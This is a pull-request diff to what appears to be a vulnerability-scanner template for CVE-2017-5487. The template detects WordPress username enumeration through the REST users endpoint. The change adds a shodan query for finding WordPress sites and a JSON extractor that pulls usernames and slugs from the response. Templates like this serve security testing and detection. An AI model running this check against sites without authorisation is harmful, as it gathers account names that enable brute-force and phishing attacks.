Merge pull request #4491 from dr0pd34d/patch-1

Added extractor for wordpress login names

cves/2017/CVE-2017-5487.yaml

@@ -2,7 +2,7 @@ id: CVE-2017-5487
 
 info:
   name: WordPress Core < 4.7.1 - Username Enumeration
-  author: Manas_Harsh,daffainfo,geeknik
+  author: Manas_Harsh,daffainfo,geeknik,dr0pd34d
   severity: medium
   description: WordPress Core < 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
   reference:
@@ -15,32 +15,42 @@ info:
     cvss-score: 5.3
     cve-id: CVE-2017-5487
     cwe-id: CWE-200
-  tags: cve,cve2017,wordpress
+  metadata:
+    verified: true
+    shodan-query: http.component:"WordPress"
+  tags: cve,cve2017,wordpress,wp
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/wp-json/wp/v2/users/"
       - "{{BaseURL}}/?rest_route=/wp/v2/users/"
+
     stop-at-first-match: true
     matchers-condition: and
     matchers:
-      - type: status
+
-        status:
-          - 200
-      - type: word
-        part: header
-        words:
-          - "application/json"
       - type: word
+        part: body
         words:
           - '"id":'
           - '"name":'
           - '"avatar_urls":'
         condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200
+
     extractors:
       - type: json
+        part: body
+        name: "usernames"
         json:
+          - '.[] | .slug'
           - '.[].name'
-
-# Enahnced by mp 03/31/2022